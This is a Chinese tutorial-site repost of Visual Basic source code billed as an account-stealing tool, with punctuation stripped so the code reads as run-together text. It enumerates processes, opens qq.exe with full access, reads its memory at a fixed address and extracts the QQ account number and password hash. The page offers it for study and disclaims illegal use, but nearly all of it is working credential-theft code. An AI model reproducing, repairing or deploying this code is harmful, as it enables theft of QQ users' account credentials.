【VB开源代码栏目提醒】:网学会员鉴于大家对VB开源代码十分关注,论文会员在此为大家搜集整理了“盗号工具源代码vb - 计算机教材”一文,供大家参考学习
※转载请注明出处如用于非法途径后果自负 模块部分代码 Option Explicit 读内存 Public Declare Function ReadProcessMemory Lib kernel32 ByVal hProcess As Long lpBaseAddress As Any lpBuffer As Any ByVal nSize As Long lpNumberOfBytesWritten As Long As Long 写内存 Public Declare Function WriteProcessMemory Lib kernel32 ByVal hProcess As Long lpBaseAddress As Any lpBuffer As Any ByVal nSize As Long lpNumberOfBytesWritten As Long As Long 取得当前窗体句柄 Public Declare Function GetForegroundWindow Lib user32 As Long 查找窗体 Public Declare Function FindWindow Lib user32 Alias FindWindowA ByVal lpClassName As String ByVal lpWindowName As String As Long 获取窗体标题 Public Declare Function GetWindowText Lib user32 Alias GetWindowTextA ByVal hwnd As Long ByVal lpString As String ByVal cch As Long As Long 取得PID Public Declare Function GetWindowThreadProcessId Lib user32 ByVal hwnd As Long lpdwProcessId As Long As Long Public Declare Function OpenProcess Lib kernel32 ByVal dwDesiredAccess As Long ByVal bInheritHandle As Long ByVal dwProcessId As Long As Long Public Declare Function CloseHandle Lib kernel32 ByVal hObject As Long As Long Public Declare Function CreateToolhelp32Snapshot Lib kernel32 ByVal dwFlags As Long ByVal th32ProcessID As Long As Long Public Declare Function Process32First Lib kernel32 ByVal hSnapshot As Long lppe As PROCESSENTRY32 As Long Public Declare Function Process32Next Lib kernel32 ByVal hSnapshot As Long lppe As PROCESSENTRY32 As Long Public Const PROCESS_ALL_ACCESS H1F0FFF Public Const MAX_PATH 260 Public Const TH32CS_SNAPPROCESS H2 Public Type PROCESSENTRY32 dwSize As Long cntUsage As Long th32ProcessID As Long th32DefaultHeapID As Long th32ModuleID As Long cntThreads As Long th32ParentProcessID As Long pcPriClassBase As Long dwFlags As Long szExeFile As String MAX_PATH End Type Public Function GetDataByVal lpName As String ByVal lpAddress As Long SaveData As Byte Optional ByVal dtLen As Long 1 As Long Dim pHandle As Long 储存进程句柄 ReDim SaveDatadtLen 初始字节缓冲区保存从内存中读取的数据 Dim lngAPIReturn As Long 保存API函数返回值的临时变量 Dim lngHSnapShot As Long 内存快照的句柄 Dim strExe As String 保存进程可执行文件名的临时变量 Dim lngProcessID As Long 某个你感兴趣的可执行文件执行后的进程的ID Dim lngHProcess As Long 某个你感兴趣的可执行文件执行后的进程的句柄 Dim lngCharaWrite As Long 保存ReadProcessMemory函数返回信息的临时变量 Dim tProcessEntry As PROCESSENTRY32 保存进程信息的结构 SaveData0 H0: GetData 0: lngProcessID 0 tProcessEntry.dwSize LentProcessEntry lngHSnapShot CreateToolhelp32SnapshotTH32CS_SNAPPROCESS 0 获得当前内存快照的句柄 lngAPIReturn Process32FirstlngHSnapShot tProcessEntry 查找内存中第一个进程 Do strExe If InStrtProcessEntry.szExeFile Chr0 1 Then strExe LefttProcessEntry.szExeFile InStrtProcessEntry.szExeFile Chr0 - 1 tProcessEntry.szExeFile SpaceMAX_PATH End If 查看可执行文件名是不是某个感兴趣的文件 If UCasestrExe UCaselpName Then 保存下该进程的ID lngProcessID tProcessEntry.th32ProcessID Exit Do End If 查找内存中下一个进程 lngAPIReturn Process32NextlngHSnapShot tProcessEntry Loop While lngAPIReturn 0 GetWindowThreadProcessId GetForegroundWindow pid 获取当前活动窗口PID If lngProcessID 0 Then GetData 2: Exit Function 打开进程 lngHProcess OpenProcessPROCESS_ALL_ACCESS False lngProcessID If lngHProcess 0 Then GetData 2: Exit Function lngAPIReturn ReadProcessMemorylngHProcess ByVal lpAddress ByVal VarPtrSaveData0 dtLen 0 关闭进程句柄 CloseHandle lngHProcess If lngAPIReturn 1 Then GetData 1 End Function 窗体代码 Option Explicit Private Sub Command1_Click Dim ss As Byte Temp As String str As Long i As Long Temp str GetDataqq.exe H162310 ss 103 If str 0 Then Debug.Print 打开内存错误 ElseIf str 1 Then For i 0 To UBoundss Temp Temp Chrssi Next Debug.Print Temp ElseIf str 2 Then Debug.Print 未找到进程名或打开错误 End If Debug.Print FindTextTemp QQUIN: PWDHASH: Debug.Print FindTextTemp PWDHASH: /STAT: End Sub Private Function FindTextByVal a1 As String ByVal a2 As String ByVal a3 As String As String On Error GoTo Err_Str FindText Mida1 InStra1 a2 Lena2 InStra1 a3 - InStra1 a2 - Lena2 1 Exit Function Err_Str: FindText Err.Clear End Function270